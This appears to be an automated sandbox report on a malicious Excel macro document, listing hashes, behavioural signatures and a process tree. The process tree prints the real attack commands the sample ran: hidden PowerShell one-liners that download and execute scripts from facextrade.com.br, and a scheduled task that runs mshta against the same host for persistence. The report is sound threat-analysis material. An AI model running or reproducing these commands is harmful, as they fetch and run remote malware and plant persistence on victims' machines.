Analysis
- max time kernel: 137s
- max time network: 140s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 16-08-2022 07:46
Behavioral task behavioral1
- Sample: SecuriteInfo.com.Exploit.Siggen3.17232.7754.xls
- Resource: win7-20220812-en
Behavioral task behavioral2
- Sample: SecuriteInfo.com.Exploit.Siggen3.17232.7754.xls
- Resource: win10v2004-20220812-en
General
- Target: SecuriteInfo.com.Exploit.Siggen3.17232.7754.xls
- Size: 33KB
- MD5: fba667decfca0daf6f92277fec2d16cf
- SHA1: e78d07658f5a3461d43f4a84747455ef025eab09
- SHA256: 3ae788e07d265a5c6d9d79c13aea5769812c205d22a89b338ab8764cd9b364f1
- SHA512: 04e59d93c8fdda2461a4d353f2cf7de4e526a54d441bfb32ffd883bdbb3db6e2d5081be31d6da61fe06b24690515278766d852fff9db5c764099032abbafe048
Signatures
Process spawned unexpected child process (4 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes (description for all four entries: Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process):
- cmd.exe (pid 2824), target EXCEL.EXE (pid 3404)
- cmd.exe (pid 3164), target EXCEL.EXE (pid 3404)
- cmd.exe (pid 4208), target EXCEL.EXE (pid 3404)
- cmd.exe (pid 4240), target EXCEL.EXE (pid 3404)
Blocklisted process makes network request (2 IoCs)
Processes:
- flow 27: powershell.exe (pid 2224)
- flow 28: powershell.exe (pid 1916)
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
- EXCEL.EXE: Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
- EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
- EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
- EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
- EXCEL.EXE: Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS
- EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
Kills process with taskkill (1 IoC)
Processes:
- taskkill.exe (pid 4228)
Runs ping.exe (1 TTP, 4 IoCs)
Processes:
- PING.EXE (pid 4340)
- PING.EXE (pid 1732)
- PING.EXE (pid 4320)
- PING.EXE (pid 3572)
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes:
- EXCEL.EXE (pid 3404)
Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes:
- powershell.exe (pid 2224), recorded twice
- powershell.exe (pid 1916), recorded twice
Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
- Token: SeDebugPrivilege, taskkill.exe (pid 4228)
- Token: SeDebugPrivilege, powershell.exe (pid 2224)
- Token: SeDebugPrivilege, powershell.exe (pid 1916)
Suspicious use of SetWindowsHookEx (12 IoCs)
Processes:
- EXCEL.EXE (pid 3404), recorded 12 times
Suspicious use of WriteProcessMemory (32 IoCs; each write below is recorded twice in the report)
Processes:
- PID 3404 (EXCEL.EXE) wrote to memory of 2824 (cmd.exe)
- PID 3404 (EXCEL.EXE) wrote to memory of 3164 (cmd.exe)
- PID 3404 (EXCEL.EXE) wrote to memory of 4208 (cmd.exe)
- PID 3404 (EXCEL.EXE) wrote to memory of 4240 (cmd.exe)
- PID 2824 (cmd.exe) wrote to memory of 4340 (PING.EXE)
- PID 3164 (cmd.exe) wrote to memory of 1732 (PING.EXE)
- PID 4240 (cmd.exe) wrote to memory of 3572 (PING.EXE)
- PID 4208 (cmd.exe) wrote to memory of 4320 (PING.EXE)
- PID 4208 (cmd.exe) wrote to memory of 1048 (cmd.exe)
- PID 1048 (cmd.exe) wrote to memory of 2224 (powershell.exe)
- PID 4208 (cmd.exe) wrote to memory of 4164 (cmd.exe)
- PID 4164 (cmd.exe) wrote to memory of 4228 (taskkill.exe)
- PID 2824 (cmd.exe) wrote to memory of 1760 (cmd.exe)
- PID 1760 (cmd.exe) wrote to memory of 1916 (powershell.exe)
- PID 3164 (cmd.exe) wrote to memory of 2928 (cmd.exe)
- PID 2928 (cmd.exe) wrote to memory of 1516 (schtasks.exe)
Processes (process tree; indentation shows parent/child depth)
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen3.17232.7754.xls"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
    C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c ping -n 80 127.0.0.1 & %public%\Outlook.bat exit
      - Process spawned unexpected child process
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\PING.EXE
          Command line: ping -n 80 127.0.0.1
          - Runs ping.exe
        C:\Windows\system32\cmd.exe
          Command line: cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
          - Suspicious use of WriteProcessMemory
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
              - Blocklisted process makes network request
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c ping -n 85 127.0.0.1 & %public%\task.bat exit
      - Process spawned unexpected child process
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\PING.EXE
          Command line: ping -n 85 127.0.0.1
          - Runs ping.exe
        C:\Windows\system32\cmd.exe
          Command line: cmd /c schtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F
          - Suspicious use of WriteProcessMemory
            C:\Windows\system32\schtasks.exe
              Command line: schtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F
              - Creates scheduled task(s)
    C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c ping -n 10 127.0.0.1 & %public%\DefenderFile.bat exit
      - Process spawned unexpected child process
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\PING.EXE
          Command line: ping -n 10 127.0.0.1
          - Runs ping.exe
        C:\Windows\system32\cmd.exe
          Command line: cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
          - Suspicious use of WriteProcessMemory
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
              - Blocklisted process makes network request
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
        C:\Windows\system32\cmd.exe
          Command line: cmd /c start /min taskkill /f /im WINWORD.EXE
          - Suspicious use of WriteProcessMemory
            C:\Windows\system32\taskkill.exe
              Command line: taskkill /f /im WINWORD.EXE
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c ping -n 7 127.0.0.1 & %public%\KilFile.bat exit
      - Process spawned unexpected child process
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\PING.EXE
          Command line: ping -n 7 127.0.0.1
          - Runs ping.exe
Downloads (files written during the run)
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (2KB)
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (1KB)
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (6KB)
- C:\Users\Public\DefenderFile.bat (1KB)
- C:\Users\Public\Outlook.bat (900B)
- C:\Users\Public\task.bat (954B)